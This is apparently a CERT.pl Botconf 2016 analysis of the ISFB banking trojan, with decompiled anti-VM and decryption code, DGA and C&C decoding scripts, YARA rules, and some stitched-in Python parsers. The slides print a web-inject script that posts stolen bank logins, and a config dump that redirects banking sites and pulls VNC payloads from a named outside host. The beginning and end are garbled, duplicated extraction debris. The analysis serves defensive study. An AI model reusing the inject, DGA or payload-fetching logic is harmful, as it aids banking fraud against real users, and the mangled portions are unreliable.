URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone


Slide 9/58: Scale

Slide 10/58: Scale (kudos to Slavo, SWITCH-CERT)

Slide 11/58: The Dropper, or where the ancients reside

Slide 12/58: Welcome to the system

· achieve persistency
· inject worker
· setup IPC
· new: download 2nd stage

Slide 13/58: Useless strings

Slide 14/58: One Rule to rule them all

    rule isfb_dropper : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "Tape Device" fullword
            $str1 = "ASCIT8" fullword
            $str2 = "IEEE 1394"
            $str3 = ".bss"
            $decode_bss = { 8D 7D ?? AB 66 AB 6A 08 AA 68 [4] 8D 5? }
        condition:
            $decode_bss and 1 of ($str*)
    }

Slide 15/58: Anti-VM (C)

    do
    {
        pci.cbSize = 20;
        GetCursorInfo(&pci);
        /* the cursor movement since the last iteration feeds the decoding key */
        ret = decode_bss(pci.ptScreenPos.y - old_y - old_x + pci.ptScreenPos.x);
        old_x = pci.ptScreenPos.x;
        old_y = pci.ptScreenPos.x;   /* sic: old_y is taken from .x, exactly as in the decompiled code */
    }
    while ( ret == 12 );             /* 12 = decoding failed, try again with the next cursor delta */

Slide 16/58: Anti-VM (C)

    DeviceInfoData.cbSize = 28;
    if ( SetupDiEnumDeviceInfo(v1, 0, &DeviceInfoData) )
    {
        /* 0xC is SPDRP_FRIENDLYNAME; the first call only asks for the buffer size */
        SetupDiGetDeviceRegistryPropertyA(v1, &DeviceInfoData, 0xCu, &Property, 0, 0, &PropertyBufferSize);
        if ( PropertyBufferSize )
        {
            v2 = (BYTE *)xHeapAlloc(PropertyBufferSize);
            v3 = (CHAR *)v2;
            if ( v2 )
            {
                if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSet, &DeviceInfoData, 0xCu, &Property, v2, PropertyBufferSize, &PropertyBufferSize)
                  && (StrStrIA(v3, (LPCSTR)"vbox") || StrStrIA(v3, "qemu") || StrStrIA(v3, "vmware") || StrStrIA(v3, "virtual hd")) )
                {
                    v0 = 1;   /* a device friendly name gave the hypervisor away */
                }
                xHeapFree(v3);
            }
        }
    }

Slide 17/58: String encryption (C)

    signed int __stdcall decode_bss(int shift)
    {
        /* v2 points to VA of .bss */
        if ( !v2 )
            return 2;
        v6 = v2->VirtualAddress;
        if ( !v6 || !v2->SizeOfRawData )
            return 192;
        v7 = v2->SizeOfRawData;
        v8 = *(_DWORD *)"016";
        v9 = v13;
        /* key: low 5 bits of the shift plus build-date string DWORDs XOR-ed with the section geometry */
        v10 = (shift & 0x1F) + (*(_DWORD *)"29 2016" ^ *(_DWORD *)"Oct 29 2016" ^ (v7 + v6));
        XorDecryptBuffer(v7, (int *)((char *)v13 + v6), v2->SizeOfRawData, v10);
        dword_4064EC = dword_40766E + dword_407662 + dword_407666;
        if ( dword_40766E + dword_407662 + dword_407666 != 0xEE553B4E )   /* check if correctly decoded */
        {
            /* wrong key: undo the decoding and report failure (12) to the caller */
            XorEncryptBuffer(dword_407662, (IMAGE_DOS_HEADER *)((char *)v9 + v2->VirtualAddress), v2->SizeOfRawData);
            v14 = 12;
        }
        /* ... */

Slide 18/58: Joined resources, or FJ-structs (C)

    typedef struct
    {
        DWORD fj_magic;
        DWORD addr;
        DWORD size;
        DWORD crc32_name;
        DWORD flags;        /* OR-ed with 0x10000 means it is packed with aPLib */
    } isfb_fj_elem;

Slide 19/58: Joined resources, or J1-structs (C)

    typedef struct
    {
        DWORD j1_magic;
        DWORD flags;        /* can be aPLib packed */
        DWORD crc32_name;
        DWORD addr;
        DWORD size;
    } isfb_fj_elem;

· 0x4F75CEA7, 0x9e154a0c - CRC_CLIENT32
· 0xD722AFCB, 0x8365B957, 0x8fb1dde1 - CRC_CLIENT_INI
· 0xE1285E64 - CRC_PUBLIC_KEY
· 0x90F8AAB4, 0x41982e1f - CRC_CLIENT64
· 0x7A042A8A - NEW - UNKNOWN
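As an added illustration (not code from the talk or from CERT.pl's tooling), here is a small Python parser for the FJ and J1 element layouts on the two slides above. It scans a buffer for element records, decodes both field orders, labels crc32_name with the table from this slide, and honours the 0x10000 aPLib flag for the FJ variant. The magic byte values (ASCII "FJ" / "J1" zero-padded to a DWORD), the treatment of addr as an offset into the scanned buffer, and the sample blob are assumptions made for this example; the slides only give the field names.

```python
import struct

# Element layouts taken from the two slides above.  Both records are 20 bytes
# (five DWORDs); only the field order differs between the FJ and J1 variants.
ELEM_SIZE = 20
FJ_APLIB_FLAG = 0x10000   # FJ flags OR-ed with 0x10000: payload is aPLib packed (from the slide)

# ASSUMPTION: the magic DWORDs are the ASCII tags the structs are named after,
# zero-padded to four bytes.  The slides only name the field (fj_magic/j1_magic).
ASSUMED_MAGICS = {"FJ": b"FJ\x00\x00", "J1": b"J1\x00\x00"}

# crc32_name values listed on the J1 slide and what they identify.
KNOWN_CRC_NAMES = {
    0x4F75CEA7: "CRC_CLIENT32",   0x9E154A0C: "CRC_CLIENT32",
    0xD722AFCB: "CRC_CLIENT_INI", 0x8365B957: "CRC_CLIENT_INI", 0x8FB1DDE1: "CRC_CLIENT_INI",
    0xE1285E64: "CRC_PUBLIC_KEY",
    0x90F8AAB4: "CRC_CLIENT64",   0x41982E1F: "CRC_CLIENT64",
    0x7A042A8A: "NEW - UNKNOWN",
}


def parse_elem(buf, off, kind):
    """Decode one 20-byte element at `off`; `kind` is "FJ" or "J1"."""
    _magic, a, b, c, d = struct.unpack_from("<5I", buf, off)
    if kind == "FJ":            # fj_magic, addr, size, crc32_name, flags
        addr, size, crc, flags = a, b, c, d
        packed = bool(flags & FJ_APLIB_FLAG)
    else:                       # j1_magic, flags, crc32_name, addr, size
        flags, crc, addr, size = a, b, c, d
        packed = None           # the slide gives no bit value for the J1 variant
    return {
        "kind": kind, "offset": off, "addr": addr, "size": size,
        "crc32_name": crc, "flags": flags, "packed": packed,
        "name": KNOWN_CRC_NAMES.get(crc, "unknown"),
    }


def find_joined_resources(buf, magics=ASSUMED_MAGICS):
    """Scan `buf` for element records and return them in file order.

    ASSUMPTION: `addr` is treated as an offset into `buf`; when addr+size
    stays inside the buffer the referenced bytes are returned as "data".
    """
    found = []
    for off in range(0, len(buf) - ELEM_SIZE + 1):
        for kind, magic in magics.items():
            if buf[off:off + len(magic)] != magic:
                continue
            elem = parse_elem(buf, off, kind)
            end = elem["addr"] + elem["size"]
            elem["data"] = buf[elem["addr"]:end] if end <= len(buf) else None
            found.append(elem)
    return found


def build_sample_blob():
    """Constructed input, not a real ISFB sample: 8 filler bytes, one FJ
    element, one J1 element, then the two payloads the elements point at."""
    filler = b"\x90" * 8
    payload_a = b"ABCD"         # CRC_CLIENT32, marked aPLib-packed
    payload_b = b"PUBKEY00"     # CRC_PUBLIC_KEY
    data_start = len(filler) + 2 * ELEM_SIZE
    fj = ASSUMED_MAGICS["FJ"] + struct.pack(
        "<4I", data_start, len(payload_a), 0x4F75CEA7, FJ_APLIB_FLAG | 1)
    j1 = ASSUMED_MAGICS["J1"] + struct.pack(
        "<4I", 0, 0xE1285E64, data_start + len(payload_a), len(payload_b))
    return filler + fj + j1 + payload_a + payload_b


if __name__ == "__main__":
    for e in find_joined_resources(build_sample_blob()):
        print(f'{e["kind"]} @{e["offset"]:#06x} {e["name"]:15s} '
              f'addr={e["addr"]:#x} size={e["size"]} packed={e["packed"]} data={e["data"]!r}')
```

Running it on a real file would mean replacing build_sample_blob() with the file contents and, for a FJ element with the packed bit set, handing "data" to an aPLib decompressor before use.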

Slide 20/58: Static configuration (C)

    typedef struct
    {
        DWORD off;
        DWORD flags;
        QWORD value;
        QWORD uid;
    } isfb_cfg_elem;

    typedef struct
    {
        QWORD count;
        isfb_cfg_elem [count];
        char string_table[];
    };

Slide 21/58: Static cfg - fields

· 0x556aed8f - server
· 0xea9ea760 - bootstrap
· 0x656b798a - botnet
· 0x4fa8693e - key
· 0xd0665bf6, 0x75e6145c - domains
· 0xefc574ae - dga_seed
· 0x73177345 - dga_base_url
· 0xec99df2e - dga_tld
· 0xdf351e24 - tor32_dll
· 0x510f22d2 - tor_domains
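Added example, not from the talk: a parser for the slide-20 layout that dumps a static configuration using the field ids from this slide. The slides give the layout only; that off is the offset of a NUL-terminated string inside string_table and that the field id is the low DWORD of uid are assumptions of this example, as is the constructed sample configuration (placeholder server name and key, not real indicators).

```python
import struct

# Header is one QWORD (count); each element is DWORD off, DWORD flags,
# QWORD value, QWORD uid; a string table follows the element array (slide 20).
HEADER = struct.Struct("<Q")
ELEM = struct.Struct("<IIQQ")

# Field ids from slide 21 (two different ids both carry the domain list).
CFG_FIELDS = {
    0x556AED8F: "server",     0xEA9EA760: "bootstrap",    0x656B798A: "botnet",
    0x4FA8693E: "key",        0xD0665BF6: "domains",      0x75E6145C: "domains",
    0xEFC574AE: "dga_seed",   0x73177345: "dga_base_url", 0xEC99DF2E: "dga_tld",
    0xDF351E24: "tor32_dll",  0x510F22D2: "tor_domains",
}
MAX_ELEMS = 4096   # sanity cap so a corrupt count cannot make the parser spin


def parse_static_cfg(blob):
    """Return a list of {name, uid, flags, value, string}, one per element.

    ASSUMPTIONS (the slides give the layout, not the semantics): `off` is the
    byte offset of a NUL-terminated string inside string_table, and the field
    id is the low 32 bits of `uid`.  `value` is passed through unchanged.
    """
    if len(blob) < HEADER.size:
        raise ValueError("blob shorter than the count header")
    (count,) = HEADER.unpack_from(blob, 0)
    if count > MAX_ELEMS:
        raise ValueError(f"implausible element count {count}")
    table_off = HEADER.size + count * ELEM.size
    if table_off > len(blob):
        raise ValueError("element array runs past the end of the blob")
    strings = blob[table_off:]
    entries = []
    for i in range(count):
        off, flags, value, uid = ELEM.unpack_from(blob, HEADER.size + i * ELEM.size)
        if off >= len(strings):
            raise ValueError(f"element {i}: string offset {off} outside string table")
        end = strings.find(b"\x00", off)
        text = strings[off:end if end != -1 else len(strings)].decode("latin-1")
        fid = uid & 0xFFFFFFFF
        entries.append({
            "name": CFG_FIELDS.get(fid, f"unknown_{fid:08x}"),
            "uid": uid, "flags": flags, "value": value, "string": text,
        })
    return entries


def build_sample_cfg(fields):
    """Serialise (field_id, text) pairs in the slide-20 layout.  Constructed
    test input; the server name and key below are placeholders, not real IoCs."""
    table = bytearray()
    elems = []
    for fid, text in fields:
        elems.append(ELEM.pack(len(table), 0, 0, fid))
        table += text.encode("latin-1") + b"\x00"
    return HEADER.pack(len(elems)) + b"".join(elems) + bytes(table)


SAMPLE_FIELDS = [
    (0x556AED8F, "c2.example.invalid"),
    (0x656B798A, "1000"),
    (0x4FA8693E, "0123456789ABCDEF"),
    (0xEC99DF2E, ".com .net"),
    (0x11223344, "something unknown"),
]


def dump_sample():
    """Parse the constructed configuration into a name -> string mapping."""
    return {e["name"]: e["string"] for e in parse_static_cfg(build_sample_cfg(SAMPLE_FIELDS))}


if __name__ == "__main__":
    for name, text in dump_sample().items():
        print(f"{name:20s} {text}")
```

Unknown field ids are kept under an unknown_XXXXXXXX name rather than dropped, so a new id introduced by a later build shows up in the dump instead of silently disappearing.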

Slide 22/58: Static cfg

Slide 23/58: Static cfg

Slide 24/58: Static cfg

Slide 25/58: Man in the Browser, or where my money goes

Slide 26/58: Dynamic config (C)

    typedef struct
    {
        DWORD size;
        BYTE data[size];
    } inject_elem;

    typedef struct
    {
        inject_elem target;      /* url glob */
        inject_elem action;      /* or regex */
        inject_elem params[4];   /* other params */
    } inject_chunk;

    typedef inject_chunk injects_t[];

Slide 27/58: Web Injects

    var bn = "US_" + "BOFA_1";
    var bot_id = "ID_" + bn;
    var sa = decode64();
    var req = "send=0&u_bot_id=" + bot_id + "&bn=" + bn + "&page=8&u_login=&u_pass=&log=" + get_me_core;
    sendScriptRequest(sa, req, function statusCall1() {
        var element = document.getElementById("loader");
        element.parentNode.removeChild(element);
    });
    })();

Slide 28/58: Web Actions

· FILE
· SCREENSHOT
· HIDDEN
· NEWGRAB
· VIDEO
· PROCESS
· POST
· VNC

Slide 29/58: Web Actions

    ACTION: REDIRECT - Target: myjs128.js -> http://51016736/di/myjs128_plv3.js
    ACTION: REDIRECT - Target: myjs28.js -> http://51016736/di/myjs28_plv3.js
    ACTION: REDIRECT - Target: ats8gate.php -> http://51016736/azatsbmidgate128.php
    ACTION: REDIRECT - Target: https://www.centrum24.pl -> http://51016736/fkcen1.php
    ACTION: REDIRECT - Target: https://companynet.mbank.pl -> http://51016736/fkmbiz1.php
    ACTION: FILE - Target: prv
    ACTION: VNC - Target: https://www.pekaobiznes24 | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
    ACTION: VNC - Target: https://companynet.mbank.pl | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
    ACTION: VNC - Target: https://iri | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
    ACTION: VNC - Target: https://kiri | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
    ACTION: VNC - Target: https://ibiznes2 | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
    ACTION: VNC - Target: https://plhomebankin | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin
    ACTION: VNC - Target: https://hbfaces | source: http://thesellingoutlet.com/p32.bin http://thesellingoutlet.com/p64.bin

(The dots of the redirect IP address, the path separators inside its URLs and the wildcard characters of the target globs did not survive extraction.)

Slide 30/58: The Bot

Slide 31/58: Registry Keys

    Software\AppDataLow\Software\Microsoft\{[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}}

· Install
· Client
· NetCfg
· LastTask
· LastConfig
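A small triage helper, added here and not part of the talk, that turns this slide into a check: match a key path against the GUID pattern and count how many of the five names are present under it. It is assumed (the slide does not say so) that Install, Client, NetCfg, LastTask and LastConfig are value names under that key; the registry dump inside the block is constructed, and triage_live_hkcu only runs on Windows.

```python
import re

# Key path pattern from the slide: a GUID-named subkey under AppDataLow.
ISFB_KEY_RE = re.compile(
    r"^Software\\AppDataLow\\Software\\Microsoft\\"
    r"\{[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}\}$",
    re.IGNORECASE,
)
# ASSUMPTION: the five names on the slide are value names stored under that key.
ISFB_VALUE_NAMES = {"Install", "Client", "NetCfg", "LastTask", "LastConfig"}
_WANTED = {v.lower(): v for v in ISFB_VALUE_NAMES}   # registry names are case-insensitive


def score_key(path, value_names, min_hits=2):
    """Return the ISFB value names present under `path`, or an empty set when
    the path does not match the pattern or fewer than `min_hits` names are there."""
    if not ISFB_KEY_RE.match(path):
        return set()
    hits = {_WANTED[n.lower()] for n in value_names if n.lower() in _WANTED}
    return hits if len(hits) >= min_hits else set()


def triage(dump, min_hits=2):
    """`dump` maps HKCU-relative key paths to their value names.  Returns the
    suspicious paths with the matching value names (sorted)."""
    out = {}
    for path, names in dump.items():
        hits = score_key(path, names, min_hits)
        if hits:
            out[path] = sorted(hits)
    return out


def triage_live_hkcu(min_hits=2):
    """Walk the real HKCU\\Software\\AppDataLow\\Software\\Microsoft on Windows
    and run triage() over it.  Only the pure functions above run elsewhere."""
    import winreg   # Windows-only; imported lazily so the rest of the file loads anywhere
    base = r"Software\AppDataLow\Software\Microsoft"
    dump = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, base) as root:
        i = 0
        while True:
            try:
                sub = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            with winreg.OpenKey(root, sub) as k:
                names, j = [], 0
                while True:
                    try:
                        names.append(winreg.EnumValue(k, j)[0])
                    except OSError:
                        break
                    j += 1
            dump[f"{base}\\{sub}"] = names
    return triage(dump, min_hits)


# Constructed registry dump (not taken from a real host).
SAMPLE_DUMP = {
    r"Software\AppDataLow\Software\Microsoft\{0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9}":
        ["Client", "NetCfg", "LastTask", "LastConfig"],
    r"Software\AppDataLow\Software\Microsoft\{11111111-2222-3333-4444-555555555555}":
        ["SomeVendorSetting"],
    r"Software\Microsoft\{0A1B2C3D-4E5F-6071-8293-A4B5C6D7E8F9}":
        ["Client", "Install"],
    r"Software\AppDataLow\Software\Microsoft\NotAGuid":
        ["Client", "Install"],
}

if __name__ == "__main__":
    for path, hits in triage(SAMPLE_DUMP).items():
        print(path, "->", ", ".join(hits))
```

The min_hits threshold is there because a lone value called Client under a GUID key is not unusual on a Windows box; two or more of the five names together under the AppDataLow path is what makes the key worth pulling for inspection.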

Slide 32/58: Other Actions

· GET_CERTS
· GET_COOKIES
· GET_SYSINFO
· LOAD_EXE
· GET_FILES
· SOCKS_START
· GET_KEYLOG
· GET_MAIL
· GET_FTP
· VNC_START
· URL_BLOCK

Slide 33/58: Calling Home

Slide 34/58: ET phone home

· Static domains inside configuration files
· DGA based on template and current data
· C&C hidden in TOR network
· P2P network

Slide 35/58: DGA (Python)

    rnd = LsaRandom()
    rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
    rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0
    r = []
    for i in range(kwargs['count']):
        suf = kwargs['tld'][(rnd.rnd() >> 1) % len(kwargs['tld'])]  # rnd.choose(kwargs['tld'])
        dom_l = rnd.rnd() % self.DGA_MIN_LEN + self.DGA_MIN_LEN
        wc = 0
        dom = []
        while wc < dom_l:
            d = rnd.choose(words)     # words: the template text the domains are built from
            ws = len(d)
            if not rnd.rnd() % 3:
                ws -= 2
            if wc + ws > self.DGA_MAX_LEN:
                continue
            dom.append(d[:ws])
            wc += ws
        r.append(''.join(dom) + suf)

Slide 36/58: TOR

Slide 37/58: P2P (C)

    typedef struct
    {
        DWORD magic;        /* 0x395f2ec1 */
        DWORD my_secret;
        DWORD his_secret;
        BYTE cmd0;
        BYTE cmd1;
        BYTE data[];
    } isfb_p2p_inner_packet;

    typedef struct
    {
        BYTE flags;
        DWORD salt;                  /* 4 random higher bytes of keys */
        isfb_p2p_inner_packet p;     /* encrypted */
    } isfb_p2p_packet;

Slide 38/58: Internet is Hard

Slide 39/58: URL format

    https://%s/user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

    /tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY

    oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

    cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2UljOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2U.jpeg

    t[RAND][RAND]=data

Slide 40/58: URL format (Python)

    decode_req = lambda d: decrypt(d.decode('base64'), SKEY)
    # the bot escapes non-URL-safe base64 characters as _XX (hex)
    d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
    try:
        e = d.decode('base64')
    except Exception as e:
        d = d + '=='             # padding is stripped by the bot, put it back
    pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

Output:

    {'crc': '7001380',
     'id': '1065',
     'ppc': 'xi',
     'server': '12',
     'soft': '1',
     'user': '0c0d784a0cf755970edbdf4c0cb27fca',
     'version': '214887'}

Slide 41/58: URL format

    path             purpose                   notes
    /t.php           get new task              Used until Sep 2015
    /c.php           get new config            Used until Sep 2015
    /d.php           send stolen data          Used until Sep 2015
    /images/*.gif    get new task              current format
    /images/*.jpeg   get new config            current format
    /images/*.bmp    send stolen data          current format
    /images/*.avi    download 2nd stage dll    not every C&C
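Added example, not the author's decoder: the request-token handling from slides 39 to 41 in one place. It undoes the _XX escaping (the _2B and _2F visible in the sample URL on slide 39), restores the base64 padding that slide 40 repairs by appending '==', splits the decrypted key=value string into a dict, and classifies request paths with the table above. The Serpent decryption with the botnet key is not implemented: decrypt is passed in as a callable, and the demo uses a constructed XOR stand-in (demo_xor, not the bot's cipher) so that the round trip runs offline. The sample parameter names and values are the ones printed on slide 40.

```python
import base64
import re

_ESCAPE_RE = re.compile(r"_([0-9A-Fa-f]{2})")

# Paths from the slide-41 table as regexes, with the purpose of each.
ISFB_PATHS = [
    (re.compile(r"/t\.php$"),          "get new task (used until Sep 2015)"),
    (re.compile(r"/c\.php$"),          "get new config (used until Sep 2015)"),
    (re.compile(r"/d\.php$"),          "send stolen data (used until Sep 2015)"),
    (re.compile(r"/images/.+\.gif$"),  "get new task"),
    (re.compile(r"/images/.+\.jpeg$"), "get new config"),
    (re.compile(r"/images/.+\.bmp$"),  "send stolen data"),
    (re.compile(r"/images/.+\.avi$"),  "download 2nd stage dll"),
]


def classify_path(path):
    """Map a request path (query string ignored) to its purpose, or None."""
    path = path.split("?", 1)[0]
    for rx, purpose in ISFB_PATHS:
        if rx.search(path):
            return purpose
    return None


def unescape(s):
    """Undo the bot's _XX escaping (slide 39 shows _2B and _2F for + and /)."""
    return _ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), s)


def pad_base64(s):
    """Restore the padding the bot strips; slide 40 does this by appending '=='."""
    return s + "=" * (-len(s) % 4)


def decode_request(blob, decrypt):
    """blob: the base64-ish token from the URL; decrypt: callable taking the raw
    ciphertext and returning plaintext bytes.  The real bot uses Serpent with
    the per-botnet key; that cipher is deliberately not implemented here."""
    raw = base64.b64decode(pad_base64(unescape(blob)), validate=True)
    plain = decrypt(raw).strip(b"\x00").decode("latin-1")
    return dict(kv.split("=", 1) for kv in plain.split("&") if "=" in kv)


def encode_request(params, encrypt):
    """Inverse of decode_request; used here only to build the constructed sample."""
    plain = "&".join(f"{k}={v}" for k, v in params.items()).encode("latin-1") + b"\x00"
    token = base64.b64encode(encrypt(plain)).decode("ascii").rstrip("=")
    return token.replace("+", "_2B").replace("/", "_2F")


# Stand-in cipher for the demo: XOR with a constructed key.  It is NOT the
# bot's Serpent and exists only so that the example round-trips offline.
_DEMO_KEY = b"constructed-demo-key"


def demo_xor(data):
    return bytes(b ^ _DEMO_KEY[i % len(_DEMO_KEY)] for i, b in enumerate(data))


# Parameter names and values as printed on slide 40.
SAMPLE_PARAMS = {"soft": "1", "version": "214887", "user": "0c0d784a0cf755970edbdf4c0cb27fca",
                 "server": "12", "id": "1065", "ppc": "xi", "crc": "7001380"}


def roundtrip_sample():
    """Encode the sample with the stand-in cipher and decode it again."""
    return decode_request(encode_request(SAMPLE_PARAMS, demo_xor), demo_xor)


if __name__ == "__main__":
    token = encode_request(SAMPLE_PARAMS, demo_xor)
    path = "/images/" + token + ".bmp"
    print(path, "->", classify_path(path))
    print(roundtrip_sample())
```

With the real key, decrypt would be the Serpent routine the bot uses; everything before and after that call (escape handling, padding, the key=value split) is what a proxy log parser needs and is what the block exercises.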

Slide 42/58: C&C response

Slide 43/58: C&C response

Slide 44/58: Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits [2]. The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

Slide 45/58: C&C response

Slide 46/58: Command and Control

Slide 47/58: IAP

    rewrite ^/fileto/(.*)\.(bin)   /get128.php?x=$1     break;
    rewrite ^/images/(.*)\.(bmp)   /data.php?x=$1$2     break;
    rewrite ^/images/(.*)\.(avi)   /loader.php?x=$1$2   break;
    rewrite ^/images/(.*)\.(gif)   /task.php?x=$1$2     break;
    rewrite ^/images/(.*)\.(jpeg)  /config.php?x=$1$2   break;

Slide 48/58: IAP

Slide 49/58: IAP

Slide 50/58: Dreambot

    RewriteEngine on
    RewriteRule ^c(.+)\.php$ new_chandler.php [L,QSA]
    RewriteRule ^t(.+)\.php$ new_thandler.php [L,QSA]
    RewriteRule ^d(.+)\.php$ new_dhandler.php [L,QSA]
    RewriteRule ^images/(.*)\.(bmp)  new_dhandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)\.(gif)  new_thandler.php?q=$1$2 [L,QSA]
    RewriteRule ^images/(.*)\.(jpeg) new_chandler.php?q=$1$2 [L,QSA]

Slide 51/58: Dreambot

Slide 52/58: Dreambot

Slide 53/58: Dreambot

    rule isfb_dreambot : banker
    {
        meta:
            author = "mak"
            module = "isfb"
        strings:
            $str0 = "vmware" fullword
            $str1 = "vbox" fullword
            $str2 = "virtual hd" fullword
            $str4 = "qemu" fullword
            $str3 = "c321.txt" fullword
        condition:
            all of them and isfb_dropper
    }

Slide 54/58: The End, or not

Slide 55/58: Offsprings and Cousins

Payloads:

· Nymaim
· Powersniff / PunchyBagg

Common Roots:

· Bolek/KBOT - based on gozi
· Rovnix - ISFB was ring3 payload protected by rovnix
· Vawtrak - Nothing in common

Slide 56/58: Recap

· One of the oldest bankers under active development
· Interesting solutions
· Various methods of infection
· Elaborate communication methods: DGA, P2P, TOR
· Old bugs die hard
· Read paper for more details
· Code soon available at mak's github: random-stuff/isfb

Slide 57/58: Kudos

People that knowingly (or not) helped us:

· Slavo
· Paul Black
· Kafeine
· Peter Kruse
· Piotr Kijewski
· Jarosław Jedynak
· Horgh
· Frank Ruiz

Slide 58/58: Q & A

info@cert.pl / www.cert.pl
CERTPolska / CERTPolska
CERTPolska / CERTPolska_en
mak / mak@cert.pl

Page 9: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 958

Scale

958

Scale

02122016 ISFB

httpslokalhostpltalksbotconf20161 1058

Scalekudos to Slavo (SWITCH-CERT)

1058

02122016 ISFB

httpslokalhostpltalksbotconf20161 1158

The Dropperor where the acients reside

02122016 ISFB

httpslokalhostpltalksbotconf20161 1258

Welcome to the system

achieve persistencyinject workersetup IPCnew download 2nd stage

middotmiddotmiddotmiddot

1258

02122016 ISFB

httpslokalhostpltalksbotconf20161 1358

Useless strings

1358

02122016 ISFB

httpslokalhostpltalksbotconf20161 1458

One Rule to rule them allrule isfb_dropper banker meta author = mak module = isfb strings $str0 = Tape Device fullword $str1 = ASCIT8 fullword $str2 = IEEE 1394 $str3 = bss $decode_bss = 8D 7D AB 66 AB 6A 08 AA 68 [4] 8D 5 condition $decode_bss and 1 of ($str)

1458

02122016 ISFB

httpslokalhostpltalksbotconf20161 1558

Anti-VM do pcicbSize = 20 GetCursorInfo(amppci) ret = decode_bss(pciptScreenPosy ‐ old_y ‐ old_x + pciptScreenPosx) old_x= pciptScreenPosx old_y =pciptScreenPosx while(ret == 12)

C

1558

Anti-VM

02122016 ISFB

httpslokalhostpltalksbotconf20161 1658

Anti-VM DeviceInfoDatacbSize = 28 if ( SetupDiEnumDeviceInfo(v1 0 ampDeviceInfoData) ) SetupDiGetDeviceRegistryPropertyA(v1 ampDeviceInfoData 0xCu ampProperty 0 0 ampPropertyBufferSize) if ( PropertyBufferSize ) v2 = (BYTE )xHeapAlloc(PropertyBufferSize) v3 = (CHAR )v2 if ( v2 ) if ( SetupDiGetDeviceRegistryPropertyA(DeviceInfoSetampDeviceInfoData0xCuampPropertyv2PropertyBufferSize ampPropertyBufferSize) ampamp (StrStrIA(v3 (LPCSTR)vbox) || StrStrIA(v3 qemu) || StrStrIA(v3 vmware) || StrStrIA(v3 virtual hd)) ) v0 = 1 xHeapFree(v3)

C

1658

02122016 ISFB

httpslokalhostpltalksbotconf20161 1758

String encryptionsigned int __stdcall decode_bss(int shift) v2 points to VA of bss if ( v2 ) return 2 v6 = v2‐gtVirtualAddress if ( v6 || v2‐gtSizeOfRawData ) return 192 v7 = v2‐gtSizeOfRawData v8 = (_DWORD )016 v9 = v13 v10 = (shift amp 0x1F) + ((_DWORD )29 2016 ^ (_DWORD )Oct 29 2016 ^ (v7 + v6)) XorDecryptBuffer(v7 (int )((char )v13 + v6) v2‐gtSizeOfRawData v10) dword_4064EC = dword_40766E + dword_407662 + dword_407666 if ( dword_40766E + dword_407662 + dword_407666 = 0xEE553B4E ) check if correctly decoded XorEncryptBuffer(dword_407662 (IMAGE_DOS_HEADER )((char )v9 + v2‐gtVirtualAddress) v2‐gtSizeOfRawData v14 = 12

C

1758

02122016 ISFB

httpslokalhostpltalksbotconf20161 1858

Joined resourcesor FJ-structs

typedef struct DWORD fj_magic DWORD addr DWORD size DWORD crc32_name DWORD flags or with 0x10000 mean it is packed with aPLib isfb_fj_elem

C

1858

02122016 ISFB

httpslokalhostpltalksbotconf20161 1958

Joined resourcesor J1-structs

